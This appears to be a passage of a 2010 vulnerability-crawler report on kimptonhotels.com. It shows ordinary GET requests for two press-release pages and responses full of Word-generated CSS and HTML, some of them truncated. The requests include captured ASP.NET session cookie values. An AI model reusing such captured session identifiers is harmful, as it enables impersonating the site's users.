{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
p.p12, li.p12, div.p12
{mso-style-name:p12;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
span.MarlieseEngel
{mso-style-name:"Marliese Engel";
mso-style-noshow:yes;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;
font-weight:normal;
font-style:normal;
text-decoration:none;
text-underline:none;
text-decoration:none;
text-line-through:none;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l4:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Arial;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Symbol;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l8
{mso-list-id:108935384..
- /pdfs/press/html/World-Savers-0909/index.html

/pdfs/press/html/World-Savers-0909/index.html

http://www.kimptonhotels.com/pdfs/press/html/World-Savers-0909/index.html

Request

GET /pdfs/press/html/World-Savers-0909/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/programs/earthcare-awards.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35989
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<link rel=OLE-Object-Data href="images/oledata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>4</o:TotalTime>
<o:LastPrinted>2009-09-01T17:34:00Z</o:LastPrinted>
<o:Created>2009-09-22T21:32:00Z</o:Created>
<o:LastSaved>2009-09-22T21:32:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>743</o:Words>
<o:Characters>4240</o:Characters>
<o:Lines>35</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>5207</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-alt:"\30D2\30E9\30AE\30CE\89D2\30B4 Pro W3";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
p.p12, li.p12, div.p12
{mso-style-name:p12;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
span.MarlieseEngel
{mso-style-name:"Marliese Engel";
mso-style-noshow:yes;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;
font-weight:normal;
font-style:normal;
text-decoration:none;
text-underline:none;
text-decoration:none;
text-line-through:none;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l4:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Arial;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Symbol;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l8
{mso-list-id:108935384..
- /pdfs/press/html/Kimpton-Blog-0910/

/pdfs/press/html/Kimpton-Blog-0910/

http://www.kimptonhotels.com/pdfs/press/html/Kimpton-Blog-0910/

Request

GET /pdfs/press/html/Kimpton-Blog-0910/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Kimpton-Blog-0910/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34697
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-06-08T21:03:00Z</o:LastPrinted> <o:Created>2010-09-22T18:36:00Z</o:Created> <o:LastSaved>2010-09-22T18:36:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>659</o:Words> <o:Characters>3761</o:Characters> <o:Lines>31</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4618</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 